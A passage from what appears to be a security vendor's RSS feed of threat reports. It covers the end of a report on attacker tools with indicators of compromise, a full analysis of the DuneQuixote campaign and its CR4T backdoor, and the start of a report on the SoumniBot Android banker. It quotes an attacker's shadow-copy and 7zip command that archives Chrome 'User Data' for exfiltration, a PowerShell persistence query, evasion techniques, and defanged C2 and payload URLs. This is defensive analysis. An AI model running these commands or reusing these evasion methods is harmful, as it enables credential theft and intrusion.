  312. <div id="attachment_112457" style="width: 777px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112457" class="size-full wp-image-112457" src="" alt="Metadata of the tool pretending to be KAV" width="767" height="268" srcset=" 767w, 300w, 740w" sizes="(max-width: 767px) 100vw, 767px" /></a><p id="caption-attachment-112457" class="wp-caption-text">Metadata of the tool pretending to be KAV</p></div>
  313. <p>Some versions of the tool required specific command-line parameters to start. An example can be seen below:</p>
  314. <div id="attachment_112458" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112458" class="size-large wp-image-112458" src="" alt="A TomBerBil variant started with a parameter" width="1024" height="187" srcset=" 1024w, 300w, 768w, 740w, 800w, 1076w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112458" class="wp-caption-text">A TomBerBil variant started with a parameter</p></div>
  315. <p>In several cases, beside using TomBerBil, the adversary created a shadow copy of the disk and archived the <strong>User Data</strong> file with <a href="" target="_blank" rel="noopener">7zip</a> for the further exfiltration.</p><pre class="crayon-plain-tag">wmic shadowcopy call create Volume='C:\'
  316. "cmd" /c c:\Intel\7z6.exe a c:\Intel\1.7z -mx0 -r
  317. \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Users\&lt;username&gt;\AppData\Local\Google\
  318. Chrome\"User Data\"</pre><p>
  319. <h2 id="conclusion">Conclusion</h2>
  320. <p>We looked at several tools that allow the attackers to maintain access to target infrastructures and automatically search for and collect data of interest. The attackers are actively using techniques to bypass defenses in an attempt to mask their presence in the system.</p>
  321. <p>To protect the organization&#8217;s infrastructure, we recommend adding to the firewall denylist the resources and IP addresses of cloud services that provide traffic tunneling. We also recommend limiting the range of tools administrators are allowed to use for accessing hosts remotely. Unused tools must be either forbidden or thoroughly monitored as a possible indicator of suspicious activity. In addition, users must be required to avoid storing passwords in their browsers, as it helps attackers to access sensitive information. Reusing passwords across different services poses a risk of more data becoming available to attackers.</p>
  322. <h2 id="indicators-of-compromise">Indicators of compromise</h2>
  323. <p><strong>Files</strong></p>
  324. <table width="100%">
  325. <tbody>
  326. <tr>
  327. <td width="60%"><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">1D2B32910B500368EF0933CDC43FDE0B</a></td>
  328. <td width="40%">WAExp</td>
  329. </tr>
  330. <tr>
  331. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">5C2870F18E64A14A64ABF9A56F5B6E6B</a></td>
  332. <td>WAExp</td>
  333. </tr>
  334. <tr>
  335. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">AFEA0827779025C92CAB86F685D6429A</a></td>
  336. <td>cuthead</td>
  337. </tr>
  338. <tr>
  339. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">C7D8266C63F8AECA8D5F5BDCD433E72A</a></td>
  340. <td>cuthead</td>
  341. </tr>
  342. <tr>
  343. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">750EF49AFB88DDD52F6B0C500BE9B717</a></td>
  344. <td>TomBerBil</td>
  345. </tr>
  346. <tr>
  347. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">853A75364D76E9726474335BCD17E225</a></td>
  348. <td>TomBerBil</td>
  349. </tr>
  350. <tr>
  351. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">BA3EF3D0947031FB9FFBC2401BA82D79</a></td>
  352. <td>Krong</td>
  353. </tr>
  354. </tbody>
  355. </table>
  356. <p><strong>legitimate tools</strong></p>
  357. <table width="100%">
  358. <tbody>
  359. <tr>
  360. <td width="60%"><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">4A79A8B1F6978862ECFA71B55066AADD</a></td>
  361. <td width="40%">FRP client</td>
  362. </tr>
  363. <tr>
  364. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">1F514121162865A9E664C919E71A6F62</a></td>
  365. <td>vpnserver_x64.exe</td>
  366. </tr>
  367. <tr>
  368. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">6F32D6CFAAD3A956AACEA4C5A5C4FBFE</a></td>
  369. <td>vpnserver_x64.exe</td>
  370. </tr>
  371. <tr>
  372. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">9DC7237AC63D552270C5CA27960168C3</a></td>
  373. <td>ngrok.exe</td>
  374. </tr>
  375. <tr>
  376. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">34985FAE5FA8E9EBAA872DE8D0105005</a></td>
  377. <td>ngrok.exe</td>
  378. </tr>
  379. </tbody>
  380. </table>
  381. <p><strong>C2 addresses</strong></p>
  382. <table width="100%">
  383. <tbody>
  384. <tr>
  385. <td width="40%"><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">103.27.202[.]85</a></td>
  386. <td width="60%">&#8211; SSH server</td>
  387. </tr>
  388. <tr>
  389. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">118.193.40[.]42</a></td>
  390. <td>&#8211; Server from SoftEther VPN</td>
  391. </tr>
  392. <tr>
  393. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">Ha[.]bbmouseme[.]com</a></td>
  394. <td>&#8211; Server from SoftEther VPN</td>
  395. </tr>
  396. </tbody>
  397. </table>
  398. <p><strong>Links</strong></p>
  399. <table width="100%">
  400. <tbody>
  401. <tr>
  402. <td width="75%"><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxp://www.netportal.or[.]kr/common/css/main.js</a></td>
  403. <td width="25%">vpnserver_x64.exe</td>
  404. </tr>
  405. <tr>
  406. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxp://www.netportal.or[.]kr/common/css/ham.js</a></td>
  407. <td>Hamcore.se2</td>
  408. </tr>
  409. <tr>
  410. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxp://23.106.122[.]5/hamcore.se2</a></td>
  411. <td>Hamcore.se2</td>
  412. </tr>
  413. <tr>
  414. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://etracking.nso.go[.]th/UserFiles/File/111/tasklist.exe</a></td>
  415. <td>vpnserver_x64.exe</td>
  416. </tr>
  417. <tr>
  418. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://etracking.nso.go[.]th/UserFiles/File/111/hamcore.se2</a></td>
  419. <td>Hamcore.se2</td>
  420. </tr>
  421. </tbody>
  422. </table>
  423. ]]></content:encoded>
  424. <wfw:commentRss></wfw:commentRss>
  425. <slash:comments>0</slash:comments>
  426. <media:content xmlns:media="" url="" width="1376" height="864"><media:keywords>full</media:keywords></media:content>
  427. <media:content xmlns:media="" url="" width="1024" height="643"><media:keywords>large</media:keywords></media:content>
  428. <media:content xmlns:media="" url="" width="300" height="188"><media:keywords>medium</media:keywords></media:content>
  429. <media:content xmlns:media="" url="" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  430. </item>
  431. <item>
  432. <title>DuneQuixote campaign targets Middle Eastern entities with &#8220;CR4T&#8221; malware</title>
  433. <link></link>
  434. <comments></comments>
  435. <dc:creator><![CDATA[GReAT]]></dc:creator>
  436. <pubDate>Thu, 18 Apr 2024 10:00:07 +0000</pubDate>
  437. <category><![CDATA[APT reports]]></category>
  438. <category><![CDATA[APT]]></category>
  439. <category><![CDATA[Backdoor]]></category>
  440. <category><![CDATA[Dropper]]></category>
  441. <category><![CDATA[DuneQuixote]]></category>
  442. <category><![CDATA[Malware]]></category>
  443. <category><![CDATA[Malware Descriptions]]></category>
  444. <category><![CDATA[Malware Technologies]]></category>
  445. <category><![CDATA[Middle East]]></category>
  446. <category><![CDATA[Targeted attacks]]></category>
  447. <category><![CDATA[Trojan]]></category>
  448. <category><![CDATA[APT (Targeted attacks)]]></category>
  449. <guid isPermaLink="false"></guid>
  451. <description><![CDATA[New unattributed DuneQuixote campaign targeting entities in the Middle East employs droppers disguised as Total Commander installer and CR4T backdoor in C and Go.]]></description>
  452. <content:encoded><![CDATA[<p><img width="990" height="400" src="" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="introduction">Introduction</h2>
  453. <p>In February 2024, we discovered a new malware campaign targeting government entities in the Middle East. We dubbed it &#8220;DuneQuixote&#8221;; and our investigation uncovered over 30 DuneQuixote dropper samples actively employed in the campaign. These droppers, which exist in two versions – regular droppers and tampered installer files for a legitimate tool named &#8220;Total Commander&#8221;, carried malicious code to download an additional payload in the form of a backdoor we call &#8220;CR4T&#8221;. While we identified only two CR4T implants at the time of discovery, we strongly suspect the existence of others, which may be completely different malware.</p>
  454. <p>The group behind the campaign took steps to prevent collection and analysis of its implants and implemented practical and well-designed evasion methods both in network communications and in the malware code.</p>
  455. <h2 id="initial-dropper">Initial dropper</h2>
  456. <p>The initial dropper is a Windows x64 executable file, although there are also DLL versions of the malware sharing the same functionality. The malware is developed in C/C++ without utilizing the Standard Template Library (STL), and certain segments are coded in pure Assembler. All samples contain digital signatures, which are, however, invalid.</p>
  457. <p>Upon execution, the malware initiates a series of decoy API calls that serve no practical purpose. These calls primarily involve string comparison functions, executed without any conditional jumps based on the comparison results.</p>
  458. <div id="attachment_112428" style="width: 805px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112428" class="size-full wp-image-112428" src="" alt="Useless function calls" width="795" height="417" srcset=" 795w, 300w, 768w, 667w, 740w, 534w" sizes="(max-width: 795px) 100vw, 795px" /></a><p id="caption-attachment-112428" class="wp-caption-text">Useless function calls</p></div>
  459. <p>The strings specified in these functions are snippets from Spanish poems. These vary from one sample to another, thereby altering the signature of each sample to evade detection using traditional detection methodologies. Following the execution of decoy functions, the malware proceeds to construct a structure for the necessary API calls. This structure is populated with offsets of Windows API functions, resolved utilizing several techniques.</p>
  460. <p>Initially, the malware decrypts the names of essential Windows core DLLs using a straightforward XOR decryption algorithm. It employs multiple decryption functions to decode strings, where a single function might decrypt several strings. However, in our analysis, we observed samples where each string was decrypted using a dedicated function, each employing a slightly varied decryption algorithm.</p>
  461. <div id="attachment_112429" style="width: 605px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112429" class="size-full wp-image-112429" src="" alt="String decryption algorithm" width="595" height="373" srcset=" 595w, 300w, 558w, 447w" sizes="(max-width: 595px) 100vw, 595px" /></a><p id="caption-attachment-112429" class="wp-caption-text">String decryption algorithm</p></div>
  462. <p>Once the necessary strings have been decrypted, the malware uses a standard technique for dynamically resolving API calls to obtain their memory offsets by:</p>
  463. <ul>
  464. <li>retrieving the offset of the Process Environment Block (PEB);</li>
  465. <li>locating the export table offset of <em>kernel32.dll</em>;</li>
  466. <li>identifying the offset for the GetProcAddress function.</li>
  467. </ul>
  468. <p>In the process of obtaining the PEB offset, the malware first decrypts the constant <em>0x60</em>, which is used to locate the PEB64 structure. This approach is of particular interest because, typically, malicious samples or shellcode utilizing this technique opt for a hardcoded plain text constant value for this purpose.</p>
  469. <div id="attachment_112430" style="width: 436px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112430" class="size-full wp-image-112430" src="" alt="Getting PEB structure offset" width="426" height="88" srcset=" 426w, 300w" sizes="(max-width: 426px) 100vw, 426px" /></a><p id="caption-attachment-112430" class="wp-caption-text">Getting PEB structure offset</p></div>
  470. <p>Next, the malware begins to populate the previously created structure with the offsets of all required functions.</p>
  471. <p>The dropper then proceeds to decrypt the C2 (Command and Control) address, employing a unique technique designed to prevent the exposure of the C2 to automated malware analysis systems. This method involves first retrieving the filename under which the dropper was executed, then concatenating this filename with one of the hardcoded strings from Spanish poems. Following this, the dropper calculates the MD5 hash of the concatenated string, which is then used as a key for decrypting the C2 string.</p>
  472. <div id="attachment_112431" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112431" class="size-large wp-image-112431" src="" alt="C2 decryption algorithm" width="1024" height="171" srcset=" 1024w, 300w, 768w, 1536w, 740w, 800w, 1545w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112431" class="wp-caption-text">C2 decryption algorithm</p></div>
  473. <p>Following the decryption of the C2 string, the malware attempts to establish a connection with the C2 server using a specifically hardcoded ID as the user agent to download the payload. During our research of the C2 infrastructure, we found that the payload remains inaccessible for download unless the correct user agent is provided. Furthermore, it appears that the payload may only be downloaded once per victim or is only available for a brief period following the release of a malware sample into the wild, as we were unable to obtain most of the payload implants from active C2 servers.</p>
  474. <p>Once the payload is downloaded into the process&#8217;s memory, the dropper performs a verification check for the &#8220;M&#8221; (<em>0x4D</em> in hexadecimal) magic byte at the start of the memory blob. This check likely serves to confirm that the payload has an MZ file signature, thereby indicating it is a valid executable format.</p>
  475. <h2 id="total-commander-installer-dropper">Total Commander installer dropper</h2>
  476. <p>The Total Commander installer dropper is created to mimic a <a href="" target="_blank" rel="noopener">legitimate Total Commander </a>software installer. It is, in fact, the legitimate installer file, but with an added malicious file section (<em>.textbss</em>) and a modified entry point. This tampering results in invalidating the official digital signature of the Total Commander installer.</p>
  477. <p>The installer dropper retains the core functionality of the initial dropper but with several key differences. Unlike the original dropper, it omits the use of Spanish poem strings and the execution of decoy functions. It also implements a series of anti-analysis measures and checks that prevent a connection to C2 resources, if any of the following conditions are true:</p>
  478. <ul>
  479. <li>a debugger is present in the system;</li>
  480. <li>known research or monitoring tools are among running processes;</li>
  481. <li><em>explorer.exe</em> process has more than two instances</li>
  482. <li>any of the following processes are running:
  483. <ul>
  484. <li>&#8220;python.exe&#8221;</li>
  485. <li>&#8220;taskmgr.exe&#8221;</li>
  486. <li>&#8220;procmon.exe&#8221;</li>
  487. <li>&#8220;resmon.exe&#8221;</li>
  488. <li>&#8220;eventvwr.exe&#8221;</li>
  489. <li>&#8220;process_hacker.exe&#8221;</li>
  490. </ul>
  491. </li>
  492. <li>less than 8 GB RAM available;</li>
  493. <li>the position of the cursor does not change over a certain timeframe;</li>
  494. <li>disk capacity is less than 40 GB.</li>
  495. </ul>
  496. <p>If any of the anti-analysis checks fail, the malware returns a value of 1. This specific return value plays a role in the decryption of the C2 server address. It triggers the removal of the first &#8220;h&#8221; from the beginning of the C2 URL (&#8220;<em>https</em>&#8220;), effectively changing it to &#8220;<em>ttps</em>&#8220;. As a result, the altered URL prevents the establishment of a connection to the C2 server.</p>
  497. <h2 id="memory-only-cr4t-implant">Memory-only CR4T implant</h2>
  498. <p>The &#8220;CR4T&#8221; implant is designed with the primary goal of granting attackers access to a console for command line execution on the victim&#8217;s machine. Additionally, it facilitates the download, upload, and modification of files. The malware carries a PDB string in its code:</p><pre class="crayon-plain-tag">"C:\Users\user\Desktop\code\CR4T\x64\Release\CR4T.pdb"</pre><p>
  499. That&#8217;s why we dubbed it &#8220;CR4T&#8221;.</p>
  500. <p>Upon execution by the dropper, the implant initiates a <em>cmd.exe</em> process in a hidden window and establishes two named pipes to enable inter-process communication. It then configures the user agent for communication with the C2 server, embedding the hardcoded value &#8220;TroubleShooter&#8221; as the user agent name for requests to the C2.</p>
  501. <div id="attachment_112432" style="width: 664px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112432" class="size-full wp-image-112432" src="" alt="User-agent string" width="654" height="132" srcset=" 654w, 300w" sizes="(max-width: 654px) 100vw, 654px" /></a><p id="caption-attachment-112432" class="wp-caption-text">User-agent string</p></div>
  502. <p>After that, the implant retrieves the computer name of the infected host as well as the username of the current user. Then it establishes a connection to the C2 server. This session provides interactive access to the command line interface of the victim&#8217;s machine via the earlier mentioned named pipes. Commands and their outputs are encoded using Base64 before being sent and decoded after receiving.</p>
  503. <p>After establishing the connection, the implant remains idle, awaiting an initial command from the C2 operator to activate the required functionality. This command is represented by a one-byte value, each one mapped to a specific action on the infected system. These single character commands would likely make more sense for an English-speaking developer/operator than a Spanish-speaking one. i.e. &#8220;D&#8221; == Download, &#8220;U&#8221; == Upload (where a Spanish speaker might use &#8220;Cargar&#8221;).</p>
  504. <table width="100%">
  505. <tbody>
  506. <tr>
  507. <td width="25%"><strong>Command</strong></td>
  508. <td width="75%"><strong>Functionality</strong></td>
  509. </tr>
  510. <tr>
  511. <td>&#8216;C'(0x43)</td>
  512. <td>Provide access to the command line interface via a named pipe.</td>
  513. </tr>
  514. <tr>
  515. <td>&#8216;D'(0x44)</td>
  516. <td>Download file from the C2</td>
  517. </tr>
  518. <tr>
  519. <td>&#8216;U'(0x55)</td>
  520. <td>Upload file to the C2</td>
  521. </tr>
  522. <tr>
  523. <td>&#8216;S'(0x53)</td>
  524. <td>Sleep</td>
  525. </tr>
  526. <tr>
  527. <td>&#8220;R&#8221;(0x52)</td>
  528. <td>Exit process</td>
  529. </tr>
  530. <tr>
  531. <td>&#8220;T&#8221;(0x57)</td>
  532. <td>Write to a file (T here possibly stands for a file-write <em>task</em>)</td>
  533. </tr>
  534. </tbody>
  535. </table>
  536. <p>During our investigation, we discovered evidence of a PowerShell file that had been created using the &#8220;T&#8221; command:</p><pre class="crayon-plain-tag">"powershell -c \"Get-ScheduledTask | Where-Object {$_.TaskName -like 'User_Feed_Sync*' -and $_.State -eq 'Running'} | Select-Object TaskName\"</pre><p>
  537. The threat actor was observed attempting to retrieve the names of all scheduled tasks on the infected machine beginning with &#8220;<em>User_Feed_Sync</em>&#8220;. These scheduled tasks were probably created by the Golang version of CR4T for persistence purposes.</p>
  538. <h2 id="memory-only-golang-cr4t-implant">Memory-only Golang CR4T implant</h2>
  539. <p>We also discovered a Golang version of the CR4T implant, which shares similar capabilities with the C version and has a similar string related to the internal naming:</p>
  540. <pre class="crayon-plain-tag">"C:/Users/user/Desktop/code/Cr4tInst/main.go"</pre> </p>
  541. <p>This variant provides a command line console for interaction with infected machines, as well as file download and upload capabilities. It also possesses the functionality to execute commands on the victim&#8217;s machine. A notable difference of this version is its ability to create scheduled tasks using the Golang <a href="">Go-ole</a> library. This library leverages Windows Component Object Model (COM) object interfaces for interacting with the Task Scheduler service.</p>
  542. <div id="attachment_112433" style="width: 716px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112433" class="size-full wp-image-112433" src="" alt=" CR4T using go-ole library" width="706" height="447" srcset=" 706w, 300w, 553w, 442w" sizes="(max-width: 706px) 100vw, 706px" /></a><p id="caption-attachment-112433" class="wp-caption-text">CR4T using go-ole library</p></div>
  543. <p>The malware is also capable of achieving persistence by utilizing the <a href="" target="_blank" rel="noopener">COM objects hijacking</a> technique. And finally, it uses the Telegram API for C2 communications, implementing the public <a href="" target="_blank" rel="noopener">Golang Telegram API</a> bindings. All the interactions are similar to the C/C++ version.</p>
  544. <h2 id="infrastructure">Infrastructure</h2>
  545. <p>The infrastructure used in this campaign appears to be located in the US at two different commercial hosters.</p>
  546. <table width="100%">
  547. <tbody>
  548. <tr>
  549. <td width="28%"><strong>Domain</strong></td>
  550. <td width="28%"><strong>IP</strong></td>
  551. <td width="28"><strong>First seen</strong></td>
  552. <td width="16%"><strong>ASN</strong></td>
  553. </tr>
  554. <tr>
  555. <td>commonline[.]space</td>
  556. <td>135.148.113[.]161</td>
  557. <td>2023 -12-16 23:20</td>
  558. <td>16276</td>
  559. </tr>
  560. <tr>
  561. <td>userfeedsync[.]com</td>
  562. <td>104.36.229[.]249</td>
  563. <td>2024-01-10 07:27</td>
  564. <td>395092</td>
  565. </tr>
  566. </tbody>
  567. </table>
  568. <h2 id="victims">Victims</h2>
  569. <p>We discovered victims in the Middle East, as per our telemetry, as early as February 2023. Additionally, there were several uploads to a semi-public malware scanning service at a later stage, more specifically starting on December 12 2023, with more than 30 submissions of the droppers in the period up to the end of January 2024. The majority of these uploads also originated from the Middle East. Other sources we suspect to be VPN exit nodes geo-located in South Korea, Luxembourg, Japan, Canada, Netherlands and the US.</p>
  570. <h2 id="conclusions">Conclusions</h2>
  571. <p>The &#8220;DuneQuixote&#8221; campaign targets entities in the Middle East with an interesting array of tools designed for stealth and persistence. Through the deployment of memory-only implants and droppers masquerading as legitimate software, mimicking the Total Commander installer, the attackers demonstrate above average evasion capabilities and techniques. The discovery of both C/C++ and Golang versions of the CR4T implant highlights the adaptability and resourcefulness of the threat actors behind this campaign.</p>
  572. <h2 id="indicators-of-compromise">Indicators of Compromise</h2>
  573. <p><strong>DuneQuixote Droppers</strong><br />
  574. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">3aaf7f7f0a42a1cf0a0f6c61511978d7</a><br />
  575. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">5759acc816274d38407038c091e56a5c</a><br />
  576. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">606fdee74ad70f76618007d299adb0a4</a><br />
  577. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">5a04d9067b8cb6bcb916b59dcf53bed3</a><br />
  578. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">48c8e8cc189eef04a55ecb021f9e6111</a><br />
  579. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">7b9e85afa89670f46f884bb3bce262b0</a><br />
  580. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">4f29f977e786b2f7f483b47840b9c19d</a><br />
  581. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">9d20cc7a02121b515fd8f16b576624ef</a><br />
  582. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">4324cb72875d8a62a210690221cdc3f9</a><br />
  583. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">3cc77c18b4d1629b7658afbf4175222c</a><br />
  584. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">6cfec4bdcbcf7f99535ee61a0ebae5dc</a><br />
  585. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">c70763510953149fb33d06bef160821c</a><br />
  586. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">f3988b8aaaa8c6a9ec407cf5854b0e3b</a><br />
  587. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">cf4bef8537c6397ba07de7629735eb4e</a><br />
  588. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">1bba771b9a32f0aada6eaee64643673a</a><br />
  589. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">72c4d9bc1b59da634949c555b2a594b1</a><br />
  590. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">cc05c7bef5cff67bc74fda2fc96ddf7b</a><br />
  591. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">0fdbe82d2c8d52ac912d698bb8b25abc</a><br />
  592. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">9b991229fe1f5d8ec6543b1e5ae9beb4</a><br />
  593. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">5e85dc7c6969ce2270a06184a8c8e1da</a><br />
  594. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">71a8b4b8d9861bf9ac6bd4b0a60c3366</a><br />
  595. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">828335d067b27444198365fac30aa6be</a><br />
  596. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">84ae9222c86290bf585851191007ba23</a><br />
  597. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">450e589680e812ffb732f7e889676385</a><br />
  598. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">56d5589e0d6413575381b1f3c96aa245</a><br />
  599. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">258b7f20db8b927087d74a9d6214919b</a><br />
  600. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">a4011d2e4d3d9f9fe210448dd19c9d9a</a><br />
  601. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">b0e19a9fd168af2f7f6cf997992b1809</a><br />
  602. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">0d740972c3dff09c13a5193d19423da1 </a><br />
  603. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">a0802a787537de1811a81d9182be9e7c</a><br />
  604. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">5200fa68b6d40bb60d4f097b895516f0</a><br />
  605. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">abf16e31deb669017e10e2cb8cc144c8</a><br />
  606. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">f151be4e882352ec42a336ca6bff7e3d</a><br />
  607. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">f1b6aa55ba3bb645d3fde78abda984f3</a><br />
  608. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">00130e1e7d628c8b5e2f9904ca959cd7</a><br />
  609. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">fb2b916e44abddd943015787f6a8dc35</a><br />
  610. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">996c4f78a13a8831742e86c052f19c20</a><br />
  611. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">4f29f977e786b2f7f483b47840b9c19d</a><br />
  612. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">91472c23ef5e8b0f8dda5fa9ae9afa94</a><br />
  613. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">135abd6f35721298cc656a29492be255</a><br />
  614. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">db786b773cd75483a122b72fdc392af6</a></p>
  615. <p><strong>Domains and IPs </strong><br />
  616. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">Commonline[.]space </a><br />
  617. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">g1sea23g.commonline[.]space</a><br />
  618. <a href=";utm_medium=SL&#038;utm_campaign=SLtarget="_blank" rel="noopener">tg1sea23g.commonline[.]space</a><br />
  619. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">telemetry.commonline[.]space</a><br />
  620. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">e1awq1lp.commonline[.]space</a><br />
  621. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">mc.commonline[.]space</a><br />
  622. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">userfeedsync[.]com</a><br />
  623. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">Service.userfeedsync[.]com</a><br />
  624. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">telemetry.userfeedsync[.]com</a></p>
  625. ]]></content:encoded>
  626. <wfw:commentRss></wfw:commentRss>
  627. <slash:comments>0</slash:comments>
  628. <media:content xmlns:media="" url="" width="1200" height="754"><media:keywords>full</media:keywords></media:content>
  629. <media:content xmlns:media="" url="" width="1024" height="643"><media:keywords>large</media:keywords></media:content>
  630. <media:content xmlns:media="" url="" width="300" height="189"><media:keywords>medium</media:keywords></media:content>
  631. <media:content xmlns:media="" url="" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  632. </item>
  633. <item>
  634. <title>SoumniBot: the new Android banker&#8217;s unique techniques</title>
  635. <link></link>
  636. <comments></comments>
  637. <dc:creator><![CDATA[Dmitry Kalinin]]></dc:creator>
  638. <pubDate>Wed, 17 Apr 2024 10:00:28 +0000</pubDate>
  639. <category><![CDATA[Malware descriptions]]></category>
  640. <category><![CDATA[Google Android]]></category>
  641. <category><![CDATA[Malware]]></category>
  642. <category><![CDATA[Malware Descriptions]]></category>
  643. <category><![CDATA[Malware Technologies]]></category>
  644. <category><![CDATA[Mobile Malware]]></category>
  645. <category><![CDATA[Trojan]]></category>
  646. <category><![CDATA[Trojan Banker]]></category>
  647. <category><![CDATA[Financial threats]]></category>
  648. <category><![CDATA[Mobile threats]]></category>
  649. <guid isPermaLink="false"></guid>
  651. <description><![CDATA[We review the new mobile Trojan banker SoumniBot, which exploits bugs in the Android manifest parser to dodge analysis and detection.]]></description>
  652. <content:encoded><![CDATA[<p><img width="990" height="400" src="" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>The creators of widespread malware programs often employ various tools that hinder code detection and analysis, and Android malware is no exception. As an example of this, droppers, such as Badpack and Hqwar, designed for stealthily delivering Trojan bankers or spyware to smartphones, are very popular among malicious actors who attack mobile devices. That said, we recently discovered a new banker, SoumniBot, which targets Korean users and is notable for an unconventional approach to evading analysis and detection, namely obfuscation of the Android manifest.</p>
